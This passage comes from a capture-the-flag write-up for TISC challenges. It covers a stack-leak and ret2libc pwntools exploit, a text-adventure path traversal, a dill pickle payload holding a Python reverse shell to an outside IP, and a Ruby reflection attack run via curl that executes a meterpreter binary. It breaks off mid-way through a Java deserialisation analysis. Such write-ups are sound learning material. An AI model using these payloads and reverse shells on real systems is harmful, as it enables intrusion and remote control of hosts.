75f0: 0x41414141 0x41414141 0x41414141 0x41414141
7600: 0x41414141 0x41414141 0x41414141 0x00000011
7610: 0x424242XX 0x41414141 0x41414141 0x41414141 < candidate XX offset
7620: 0x41414141 0x41414141 0x41414141 0x41414141
7630: 0x41414141 0x41414141 0x41414141 0x00000082 < *2nd memcpy dst
7640: 0xb5617630 0x00007ffc 0xb5617600 0x00007ffc
7650: 0x424275d0 0x41414141 0x41414141 0x41414141
7660: 0x41414141 0x41414141 0x41414141 0x00000082 < 12 filler bytes | 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630 0x00007ffc 0xb5617600 0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0 0x00007ffc 0xd1686300 0x697ee648 < 2nd memcpy src | stack canary
7690: 0xb56176c0 0x00007ffc 0x2b782ea2 0x00005597 < stack pointer | return pointer
76a0: 0x2b784010 0x00005597 0x2b781540 0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956 0x00005597 0xd1686300 0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010 0x00005597 0x655fbe4a 0x00007fca < _libc_csu_init | __libc_start_main+234
Nothing too special. However, the magic happened in the next memcpy
. The stack AFTER the second memcpy
and BEFORE the third memcpy
looked like this:
75d0: 0x41414141 0x41414141 0x41414141 0x41414141
75e0: 0x41414141 0x41414141 0x41414141 0x41414141
75f0: 0x41414141 0x41414141 0x41414141 0x41414141
7600: 0x41414141 0x41414141 0x41414141 0x00000011
7610: 0x424242XX 0x41414141 0x41414141 0x41414141
7620: 0x41414141 0x41414141 0x41414141 0x41414141
7630: 0x41414141 0x41414141 0x41414141 0x41414141
7640: 0x41414141 0x41414141 0x41414141 0x41414141
7650: 0x41414141 0x41414141 0x41414141 0x41414141
7660: 0x41414141 0x41414141 0x41414141 0x00000011 < 12 filler bytes | 3rd memcpy n + 1
7670: 0xb56176XX 0x00007ffc 0xb5617600 0x00007ffc < 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0 0x00007ffc 0xd1686300 0x697ee648 < 2nd memcpy src | stack canary
7690: 0xb56176c0 0x00007ffc 0x2b782ea2 0x00005597 < stack pointer | return pointer
76a0: 0x2b784010 0x00005597 0x2b781540 0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956 0x00005597 0xd1686300 0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010 0x00005597 0x655fbe4a 0x00007fca < _libc_csu_init | __libc_start_main+234
I overwrote two important values:
- The
n
used to generate the 3rdmemcpy
'ssize
argument (n-1
) to0x11
. - The last byte of the 3rd
memcpy
'ssrc
argument to my candidate byte offset0xXX
.
When my brute force set the candidate byte to 0x98
, the 3rd memcpy
's src
pointed to the stack address of the return pointer (0x7ffcb5617698
), allowing me to copy the return pointer address to sanity_test_input
. The overwritten n
also set sanity_test_result
to *0x7ffcb56176a8 = 0x40
which passed the sanity test. After that, I could simply enter a string of length 0x11
like 1111111111111111
at the “Get Recruited” prompt, which XORed the stored sanity_test_input
. I could then run “Show what you have for the Cromulon currently” to output the result and XOR it with 1111111111111111
again to retrieve the return pointer value.
If the candidate offset correctly retrieved the return pointer, the first retrieved byte would be the return pointer's last byte. This seemed to always match 0xa2
, so I used this constant to check for a successful candidate. There was a chance that no valid candidates existed; if the return pointer was at 0x7ffcb5617708
but the 3rd memcpy
src
value was originally set to 0x7ffcb56176X8
, I could only brute force the last byte up to 0x7ffcb56176f8
. In this case, I simply needed to run the exploit again and hope to get lucky.
I deducted a fixed offset (0x3EA2
) from the return pointer value to get the base address of the executable. Additionally, now that I knew the offset in the stack to the return pointer, I could add or subtract it accordingly to retrieve other interesting values on the stack, such as __libc_start_main+234
, the stack canary, and a valid stack pointer.
With those values, I could send a large input with the proper stack canary and overwrite the return pointer to my desired function pointer, such as system
in libc
. I avoided crashing the three memcpy
s by overwriting the src
and dest
arguments to the leaked valid stack addresses and setting the size
argument to something small like 1.
At first, I tried to return to an interesting function in the binary that printed the flag:
__int64 read_flag()
{
char v1; // [rsp+Fh] [rbp-231h] BYREF
char v2[264]; // [rsp+10h] [rbp-230h] BYREF
_QWORD v3[37]; // [rsp+118h] [rbp-128h] BYREF
v3[34] = __readfsqword(0x28u);
std::fstream::basic_fstream(v2);
std::fstream::open(v2, "/root/f1988cec5de9eaa97ab11740e10b1fc8d6db8123", 8LL);
if ( (unsigned __int8)std::ios::operator!(v3) )
{
std::operator<<<std::char_traits<char>>(&std::cout, "No such file\n");
}
else
{
while ( 1 )
{
std::operator>><char,std::char_traits<char>>(v2, &v1);
if ( (unsigned __int8)std::ios::eof(v3) )
break;
std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v1);
}
std::operator<<<std::char_traits<char>>(&std::cout, "\n");
}
std::fstream::close(v2);
std::fstream::~fstream(v2);
return 0LL;
}
However, despite the exploit working locally, I could not get it to work remotely. I assumed that this was because the executable crashed too quickly to return output over the network. As such, I decided to go the ret2libc
route and get a shell by adding system
to the call stack. Since the offsets in libc
varied widely over different versions, I used the file disclosure vulnerability from earlier to leak /proc/self/maps
and /etc/os-release
to determine the exact OS and libc
versions, which were “Ubuntu 20.04.3 LTS (Focal Fossa)” and libc-2.31.so
respectively. Since Googling the server's IP address revealed that it belonged to a DigitalOcean Singapore cluster, I spun up a free Droplet instance on the same cluster with the matching OS version to retrieve the offsets. This turned out to be a hidden bonus because the proximity of my Droplet instance to the target server allowed my exploit to catch the shell faster before the program crashed.
Finally, I needed to pop the pointer to /bin/sh
in libc
into RDI before calling system
. This was because the x64 calling convention uses RDI as the first argument for a function call. I used rp++
to dump ROP gadgets from the binary and added the POP RDI, RET
gadget to the overwritten call stack.
At long last, I completed my full exploit code:
from pwn import *
p = remote('<IP ADDRESS>', 53619)
##p = process('./1adb53a4b156cef3bf91c933d2255ef30720c34f')
def byte_xor(ba1, ba2):
return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])
## leak base_addr of executable
return_pointer_offset = 8
while True:
# send payload
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # third memcpy n; vary this until sanity test passes
payload += packing.p8(return_pointer_offset) # candidate offset to return pointer on stack
payload += b'B' * 43 # more offset
payload += b'\x82' # first memcpy n / second memcpy n * 2
p.sendline(payload)
# retrieve sanity_test_input
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
p.sendline(b'1111111111111111')
p.recvuntil("> ")
p.sendline(b'4')
p.recvuntil("`======/")
p.recvline()
candidate = p.recvline()
print(candidate.hex())
if 0x93 == candidate[0]: # confirm that this is a leaked function address; last byte is 0xa2 == 0x93 XOR 0x31
base_addr = (int.from_bytes(byte_xor(candidate[:6][::-1], b'111111'), 'big', signed=False) - 0x3EA2).to_bytes(8, byteorder='big', signed=False)
log.info('Base address: {}'.format(base_addr.hex()))
p.recvuntil("> ")
p.sendline(b'6')
break
p.recvuntil("> ")
p.sendline(b'6')
return_pointer_offset += 16
libc_start_main_plus_234_offset = return_pointer_offset + 0x30 # offset in stack from function pointer to __libc_start_main+234
canary_offset = return_pointer_offset - 0x10 + 1 # offset in stack from function pointer to canary + 1 (skip null token)
stack_address_offset = return_pointer_offset - 0x18 # offset in stack from function pointer to canary + 1 (skip null token)
if stack_address_offset < 0 or libc_start_main_plus_234_offset > 255:
log.error("Base offset is too low")
## leak canary
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result passes
payload += packing.p8(canary_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
p.sendline(b'1111111111111111')
p.recvuntil("> ")
p.sendline(b'4')
p.recvuntil("`======/")
p.recvline()
candidate = p.recvline()
canary = byte_xor(candidate[:7][::-1], b'1111111') + b'\x00' # restore null last byte
log.info("Canary: {}".format(canary.hex()))
p.recvuntil("> ")
p.sendline(b'6')
## leak libc_main_plus_234
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result == B which passes test4 #21 for local
payload += packing.p8(libc_start_main_plus_234_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
p.sendline(b'1111111111111111')
p.recvuntil("> ")
p.sendline(b'4')
p.recvuntil("`======/")
p.recvline()
candidate = p.recvline()
libc_main_plus_234 = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
log.info('libc_main_plus_234 address: {}'.format(libc_main_plus_234.hex()))
p.recvuntil("> ")
p.sendline(b'6')
## leak stack address
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x19\x00\x00\x00' # ensures that sanity_test_result passes test4
payload += packing.p8(stack_address_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
p.sendline(b'1111111111111111')
p.recvuntil("> ")
p.sendline(b'4')
p.recvuntil("`======/")
p.recvline()
candidate = p.recvline()
stack_address = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
log.info('Stack address: {}'.format(stack_address.hex()))
p.recvuntil("> ")
p.sendline(b'6')
## prepare addresses
flag_function_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3BBC).to_bytes(8, byteorder='big', signed=False)
log.info('Flag function address: {}'.format(flag_function_address.hex()))
get_recruited_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3606).to_bytes(8, byteorder='big', signed=False)
log.info('get_recruited function address: {}'.format(get_recruited_address.hex()))
pop_rdi_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x5073).to_bytes(8, byteorder='big', signed=False)
log.info('pop_rdi_ret address: {}'.format(pop_rdi_ret.hex()))
libc_base_addr = (int.from_bytes(libc_main_plus_234, 'big', signed=False) - 0x270B3).to_bytes(8, byteorder='big', signed=False)
log.info('libc_base_addr address: {}'.format(libc_base_addr.hex()))
libc_system_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x55410).to_bytes(8, byteorder='big', signed=False)
log.info('libc_system_addr: {}'.format(libc_system_addr.hex()))
libc_bin_sh_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x1B75AA).to_bytes(8, byteorder='big', signed=False)
log.info('libc_bin_sh_addr: {}'.format(libc_bin_sh_addr.hex()))
dec_ecx_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x2AE2).to_bytes(8, byteorder='big', signed=False)
## prepare final payload
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 108 # offset
payload += b'\x01\x00\x00\x00' # n
payload += stack_address[::-1] # valid stack address
payload += stack_address[::-1] # valid stack address
payload += stack_address[::-1] # valid stack address
payload += canary[::-1] # valid canary
payload += b'A' * 8 # offset
payload += flag_function_address[::-1] # try to call flag function - somehow this doesn't work remotely?
payload += pop_rdi_ret[::-1] # ROP to pop pointer to "/bin/sh" to RDI
payload += libc_bin_sh_addr[::-1] # pointer to "/bin/sh"
payload += libc_system_addr[::-1] # pointer to system
## send final payload
print(p.recvline())
print(p.recv())
p.sendline(payload)
p.interactive()
I ran this several times on my Droplet instance and eventually got my shell.
TISC{30e903d64775c0120e5c244bfe8cbb0fd44a908b}
Level 9: 1865 Text Adventure
This was my favourite level and felt like a digital work of art. I loved the storyline and although one of the domains was Pwn, it was actually Web as you will see soon. Finally, it involved a lot of code review, which I enjoyed.
It began with a tumble...
Part 1: Down the Rabbit Hole
Domains: Pwn, Cryptography
Text adventures are fading ghosts of a faraway past but this one looks suspiciously brand new... and it has the signs of PALINDROME all over it.
Our analysts believe that we need to learn more about the White Rabbit but when we connect to the game, we just keep getting lost!
Can you help us access the secrets left in the Rabbit's burrow?
The game is hosted at 165.22.48.155:26181.
No kernel exploits are required for this challenge.
Connecting to <IP ADDRESS>:26181
kicked off a long, scrolling text adventure.
I could look
around my location, move
to another exit, read
notes, or get
items. I set about enumerating every path in the text adventure. Along the way, I picked up several useful items:
- The Pocket Watch: This gave me access to an options menu, which I used to turn off the annoying scrolling text.
- The Looking Glass: This gave me the ability to teleport to other locations in the story.
teleport bottom-of-a-pit/deeper-into-the-burrow
- Golden Hookah: This gave me the ability to save messages... somewhere.
blowsmoke <NAME> <MESSAGE>
.
After a few twists and turns, the text adventure reached a dead end.
[cosmic-desert] move tear-in-the-rift
You have moved to a new location: 'tear-in-the-rift'.
You look around and see:
A curious light shines in the distance. You cannot quite reach it though.
Music tinkles through the rift:
A very merry unbirthday
To you
Who, me?
Yes, you
Oh, me
Let's all congratulate us with another cup of tea
A very merry unbirthday to you
There are the following things here:
* README (note)
[tear-in-the-rift] read README
You read the writing on the note:
Do you hear that? What lovely party sounds!
Wouldn't it be lovely to crash it and get some tea and crumpets?
Too bad you're stuck here!
You can cage a swallow, can't you, but you can't swallow a cage, can you?
Fly back to school now, little starling.
- PALINDROME
With nowhere left to go, I began messing about with the items. My first clue surfaced when I used the Golden Hookah to send a message with a format string.
[tear-in-the-rift] blowsmoke spaceraccoon %s
Smoke bellows from the lips of spaceraccoon to form the words, "%s."
Curling and curling...
Traceback (most recent call last):
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
self.evaluate(user_line)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
cmd.run(args)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 511, in run
response = urlopen(url)
File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python3.8/urllib/request.py", line 531, in open
response = meth(req, response)
File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
response = self.parent.error(
File "/usr/lib/python3.8/urllib/request.py", line 569, in error
return self._call_chain(*args)
File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
result = func(*args)
File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 400: Bad Request
The Python backend was trying to send a HTTP request with my message! However, further experimentation with traversal and command injection payloads failed to yield any results. I moved on to The Looking Glass. I attempted several invalid inputs, including a long string:
[cosmic-desert] teleport vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>
Traceback (most recent call last):
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
self.evaluate(user_line)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
cmd.run(args)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 475, in run
if rel_path.exists() and rel_path.is_dir():
File "/usr/lib/python3.8/pathlib.py", line 1407, in exists
self.stat()
File "/usr/lib/python3.8/pathlib.py", line 1198, in stat
return self._accessor.stat(self)
OSError: [Errno 36] File name too long: '/opt/wonderland/down-the-rabbithole/stories/vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>'
This looked like a directory traversal! Perhaps teleporting meant moving to a different folder location in the server. I took the next obvious step.
[tear-in-the-rift] teleport ../../../../etc
You have moved to a new location: 'etc'.
You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
There are the following things here:
* environment (note)
* fstab (note)
* networks (note)
* mke2fs.conf (note)
* ld.so.conf (note)
* passwd (note)
* shells (note)
* debconf.conf (note)
* ld.so.cache (note)
* legal (note)
* xattr.conf (note)
* hostname (note)
* e2scrub.conf (note)
* issue (note)
* bindresvport.blacklist (note)
...
Bingo! Now that I was in a different folder, I could read files with the read
command. After enumerating various locations, I ended up in /home/rabbit
which contained the first flag.
[mouse] teleport ../../../../home/rabbit
You have moved to a new location: 'rabbit'.
You look around and see:
You enter the Rabbit's burrow and find it completely ransacked. Scrawled across the walls of the
tunnel is a message written in blood: 'Murder for a jar of red rum!'.
Your eyes are drawn to a twinkling letter and lockbox that shines at you from the dirt.
There are the following things here:
* flag2.bin (note)
* flag1 (note)
[rabbit] read flag1
You read the writing on the note:
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}
Part 2: Pool of Tears
It looks like the Rabbit knew too much about PALINDROME. Within his cache of secrets lies a special device that might just unlock clues to tracking down the elusive trickster. However, our attempts to read it yield pure gibberish.
It appears to require... activation. To activate it, we must first become the Rabbit.
Please assume the identity of the Rabbit.
The challenge description hinted that I needed to get a working shell as rabbit
to execute flag2.bin
. I returned to the /opt/wonderland/down-the-rabbithole
folder that contained the Python source code for the text adventure. rabbithole.py
contained most of the game logic. Right away, I noticed that it imported pickletools
and used Python object deserialisation (dill.loads
) to “get” items.
def run(self, args):
if len(args) < 2:
letterwise_print("You don't see that here.")
return
for i in self.game.get_items():
if (args[1] + '.item') == i.name and args[1] not in self.game.inventory:
got_something = True
# Check that the item must be serialised with dill.
item_data = open(i, 'rb').read()
if not self.validate_stream(item_data):
letterwise_print('Seems like that item may be an illusion.')
return
item = dill.loads(item_data)
letterwise_print("You pick up '{}'.".format(item.key))
self.game.inventory[item.key] = item
item.prepare(self.game)
item.on_get()
return
Since Python object deserialisation was an easy code execution vector, I focused on this lead. How could I create a pickle file on the server to “get” later? Enumerating more folders, I realised that /opt/wonderland
contained the source code of two other applications:
[..] teleport ../..
You have moved to a new location: '..'.
You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
You see exits to the:
* logs
* pool-of-tears
* a-mad-tea-party
* down-the-rabbithole
* utils
a-mad-tea-party
turned out to be a Java application, while pool-of-tears
contained a Ruby on Rails web API. In logs
, I found some of the messages I sent using blowsmoke
earlier. This suggested that blowsmoke
enabled me to write files – exactly what I needed.
To prepare my pickle, I referred to the generate_items.py
script from the source code of down-the-rabbithole
. The application validated items by checking for rabbithole
, dill._dill
, and on_get
properties, so I reused the code to meet these requirements with one importance difference – my payload generation script inserted a Python reverse shell in on_get
.
import dill
import types
from rabbithole import Item
import socket
import os
import pty
import urllib.parse
dill.settings['recurse'] = True
def write_object(location, obj):
'''Writes an object to the specified location.
'''
with open(location, 'wb') as f:
dill.dump(obj, f, recurse=True)
def make_item(key, on_get):
'''Makes a new item dynamically.
'''
item = Item(key)
item.on_get = types.MethodType(on_get, item)
return item
def payload_on_get(self):
'''Add the options command when picked up.
'''
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<IP ADDRESS>",4242))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
def setup_payload():
item = make_item('payload', payload_on_get)
write_object('payload.item', item)
if __name__ == '__main__':
setup_payload()
# open_payload()
with open('payload.item', 'rb') as file:
print("Generated {}".format(urllib.parse.quote(file.read())))
After generating the URL-encoded payload, I sent it off with blowsmoke a.item <URL-ENCODED PAYLOAD>
. This saved the payload to /opt/wonderland/logs/tear-in-the-rift-a.item
. Finally, in the text adventure game, I teleported to /opt/wonderland/logs
and ran get tear-in-the-rift-a.item
to execute the payload. To save time, I automated the entire process with pwntools
.
from pwn import *
import urllib
p = remote('<IP ADDRESS>', 26181)
print(p.recvuntil(b']'))
p.sendline(b'move a-shallow-deadend')
print(p.recvuntil(b']'))
p.sendline(b'get pocket-watch')
print(p.recvuntil(b']'))
p.sendline(b'options text_scroll False')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move deeper-into-the-burrow')
print(p.recvuntil(b']'))
p.sendline(b'move a-curious-hall')
print(p.recvuntil(b']'))
p.sendline(b'get pink-bottle')
print(p.recvuntil(b']'))
p.sendline(b'move a-pink-door')
print(p.recvuntil(b']'))
p.sendline(b'move maze-entrance')
print(p.recvuntil(b']'))
p.sendline(b'move knotted-boughs')
print(p.recvuntil(b']'))
p.sendline(b'move dazzling-pines')
print(p.recvuntil(b']'))
p.sendline(b'move a-pause-in-the-trees')
print(p.recvuntil(b']'))
p.sendline(b'move confusing-knot')
print(p.recvuntil(b']'))
p.sendline(b'move green-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move a-fancy-pavillion')
print(p.recvuntil(b']'))
p.sendline(b'get fluffy-cake')
print(p.recvuntil(b']'))
p.sendline(b'move along-the-rolling-waves')
print(p.recvuntil(b']'))
p.sendline(b'move a-sandy-shore')
print(p.recvuntil(b']'))
p.sendline(b'move a-mystical-cove')
print(p.recvuntil(b']'))
p.sendline(b'get looking-glass')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move further-into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move nearing-a-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move clearing-of-flowers')
print(p.recvuntil(b']'))
p.sendline(b'get morning-glory')
print(p.recvuntil(b']'))
p.sendline(b'move under-a-giant-mushroom')
print(p.recvuntil(b']'))
p.sendline(b'get golden-hookah')
print(p.recvuntil(b']'))
p.sendline(b'move eternal-desolation')
print(p.recvuntil(b']'))
p.sendline(b'move cosmic-desert')
print(p.recvuntil(b']'))
p.sendline(b'move tear-in-the-rift')
print(p.recvuntil(b']'))
## read flag2.bin
## p.sendline(b'teleport ../../../../home/rabbit')
## print(p.recvuntil(b'[rabbit]'))
## p.sendline(b'read flag2.bin')
## flag2_bin = p.recvuntil(b']')
## with open('flag2.bin', 'wb') as file:
## file.write(flag2_bin)
## send payload
with open('payload.item', 'rb') as file:
p.sendline(b'blowsmoke a.item ' + urllib.parse.quote(file.read()).encode())
print(p.recvuntil(b']'))
## execute payload
p.sendline(b'teleport ../../../../opt/wonderland/logs')
print(p.recvuntil(b']'))
p.sendline(b'get tear-in-the-rift-a')
print(p.recvuntil(b']'))
p.interactive()
The exploit went off without a hitch and I got my shell.
TISC{dr4b_4s_a_f00l_as_al00f_a5_A_b4rd}
Part 3: Advice from a Caterpillar
PALINDROME's taunts are clear: they await us at the Tea Party hosted by the Mad Hatter and the March Hare. We need to gain access to it as soon as possible before it's over.
The flowers said that the French Mouse was invited. Perhaps she hid the invitation in her warren. It is said that her home is decorated with all sorts of oddly shaped mirrors but the tragic thing is that she's afraid of her own reflection.
This challenge description included the key word “reflection”. I immediately thought of Java reflection attacks but the Java app a-mad-tea-party
was executed by the hatter
user rather than mouse
. From my shell, I exfiltrated all the source code in /opt/wonderland
and reviewed the pool-of-tears
Rails application run by mouse
.
The controller logic for the blowsmoke API at pool-of-tears/app/controllers/smoke_controller.rb
had the following code.
def remember
# Log down messages from our happy players!
begin
ctype = "File"
if params.has_key? :ctype
# Support for future appending type.
ctype = params[:ctype]
end
cargs = []
if params.has_key?(:cargs) && params[:cargs].kind_of?(Array)
cargs = params[:cargs]
end
cop = "new"
if params.has_key?(:cop)
cop = params[:cop]
end
if params.has_key?(:uniqid) && params.has_key?(:content)
# Leave the kind messages
fn = Rails.application.config.message_dir + params[:uniqid]
cargs.unshift(fn)
c = ctype.constantize
k = c.public_send(cop, *cargs)
if k.kind_of?(File)
k.write(params[:content])
k.close()
else
# TODO: Implement more types when we need distributed logging.
# PALINDROME: Won't cat lovers revolt? Act now!
render :plain => "Type is not implemented yet."
return
end
else
render :plain => "ERROR"
return
end
rescue => e
render :plain => "ERROR: " + e.to_s
return
end
The comments and the use of ctype.constantize
attracted my attention and I wondered if Ruby reflection attacks existed. They did.
Based on the source code, the ctype
parameter initalised a matching Ruby object with ctype.constantize
. Thereafter, c.public_send
executed any of that object's public methods based on the cop
parameter. The method was executed with arguments from the cargs
array parameter.
However, pool-of-tears
featured an interesting twist: because it prepended Rails.application.config. message_dir + params[:uniqid]
string to the cargs
array, I could not execute anything I wanted; the method needed to accept the concatenated file path as the first argument. For example, one publicly-known Ruby reflection payload used Object.public_send("send","eval","system 'uname'")
, which required the first argument to send
to be eval
. Since eval
was a private method for Object
, I could not execute it directly with public_send
.
I searched the Ruby documentation for a suitable class and public method that allowed me to execute code. Eventually, I found the Kernel class that included an exec
public method. The first argument determined the command to be executed. Since this could be a file path, I realised that I could exploit a path traversal by sending a uniqid
parameter like ../../../../../tmp/meterpreter
. This led to c.public_send('exec', '/opt/wonderland/logs/../../../../../tmp/meterpreter')
, therefore executing my meterpreter payload.
I uploaded the payload to /tmp/met64.elf
, then triggered the API with curl 'http://localhost:4000/ api/v1/smoke?ctype=Kernel&cop=exec&uniqid= ../../../../tmp/met64.elf&content=test'
. After a few tense seconds, I got my shell!
/home/mouse
contained a binary flag3.bin
which I executed to retrieve the flag. The directory also included an-unbirthday-invitation.letter
:
Dear French Mouse,
The March Hare and the Mad Hatter
request the pleasure of your company
for an tea party evening filled with
clocks, food, fiddles, fireworks & more
Last Month
25:60 p.m.
By the Stream, and Into the Woods
Also available by way of port 4714
Comfortable outdoor attire suggested
PS: Dormouse will be there!
PSPS: No palindromes will be tolerated! Nor are emordnilaps, and semordnilaps!
By the way, please quote the following before entering the party:
ed4a1a59-0869-48ad-8bc6-ac64b04b02b6
TISC{mu5t_53ll_4t_th3_t4l13sT_5UM}
Part 4: A Mad Tea Party
Great! We have all we need to attend the Tea Party!
To get an idea of what to expect, we've consulted with our informant (initials C.C) who advised:
“Attend the Mad Tea Party.
Come back with (what's in) the Hatter's head.
Sometimes the end of a tale might not be the end of the story.
Things that don't make logical sense can safely be ignored.
Do not eat that tiny Hello Kitty.”
This is nonsense to us, so you're on your own from here on out.
As described in the invitation letter, the challenge ran the final Java application a-mad-tea-party
on localhost port 4714
.
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
Based on the source code of the application at tea-party/src/main/java/com/mad/hatter/App.java
, I decided that the most likely exploit vector was the “Eat Cake” option, which would deserialise the fireworks byte array into a Firework
object before executing firework.fire()
:
case 9:
System.out.println("You eat the cake and you feel good!");
for (Cake.Decoration deco : cakep.getDecorationsList()) {
if (deco == Cake.Decoration.TINY_HELLO_KITTY) {
running = false;
System.out.println("A tiny Hello Kitty figurine gets lodged in your " +
"throat. You get very angry at this and storm off.");
break;
}
}
if (cakep.getFireworksCount() == 0) {
System.out.println("Nothing else interesting happens.");
} else {
for (ByteString firework_bs : cakep.getFireworksList()) {
byte[] firework_data = firework_bs.toByteArray();
Firework firework = (Firework) conf.asObject(firework_data); // deserialisation
firework.fire();
}
}
break;
I believed this was the exploit vector because Java deserialisation was an infamous code execution method. However, I could not add a deserialisation payload using “Add a Firework” because it only allowed me to select from a pre-set list of fireworks.
Which firework do you wish to add?
1. Firecracker.
2. Roman Candle.
3. Firefly.
4. Fountain.
Firework: 1
Firework added!
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"
These fireworks had unexciting payloads, as seen in Firefly.java
:
package com.mad.hatter;
public class Firefly extends Firework {
static final long serialVersionUID = 45L;
public void fire() {
System.out.println("Firefly! Firefly! Firefly! Firefly! Fire Fire Firefly!");
}
}
Meanwhile, the “Cake to Go” option exported my current cake in the format {"cake":"<HEX(BASE64(PROTOBUF serialisED CAKE DATA))>","digest":"<ENCRYPTED HASH>"}
.
Choice: 7
Here's your cake to go:
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}
I could also import cakes with the “Go to Cake” option.
Choice: 8
Please enter your saved cake: {"cake":""<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"
This looked like a good way to smuggle my own Firework data. However, the source code revealed that the application properly validated the digest
value using a SHA-512 hash.
case 8:
System.out.print("Please enter your saved cake: ");
scanner.nextLine();
String saved = scanner.nextLine().trim();
try {
HashMap<String, String> hash_map = new HashMap<String, String>();
hash_map = (new Gson()).fromJson(saved, hash_map.getClass());
byte[] challenge_digest = Hex.decodeHex(hash_map.get("digest"));
byte[] challenge_cake_b64 = Hex.decodeHex(hash_map.get("cake"));
byte[] challenge_cake_data = Base64.decodeBase64(challenge_cake_b64);
MessageDigest md = MessageDigest.getInstance("SHA-512");
byte[] combined = new byte[secret.length + challenge_cake_b64.length];
System.arraycopy(secret, 0, combined, 0, secret.length);
System.arraycopy(challenge_cake_b64, 0, combined, secret.length,
challenge_cake_b64.length);
byte[] message_digest = md.digest(combined);
if (Arrays.equals(message_digest, challenge_digest)) {
Cake new_cakep = Cake.parseFrom(challenge_cake_data);
cakep.clear();
cakep.mergeFrom(new_cakep);
System.out.println("Cake successfully gotten!");
}
else {
System.out.println("Your saved cake went really bad...");
}
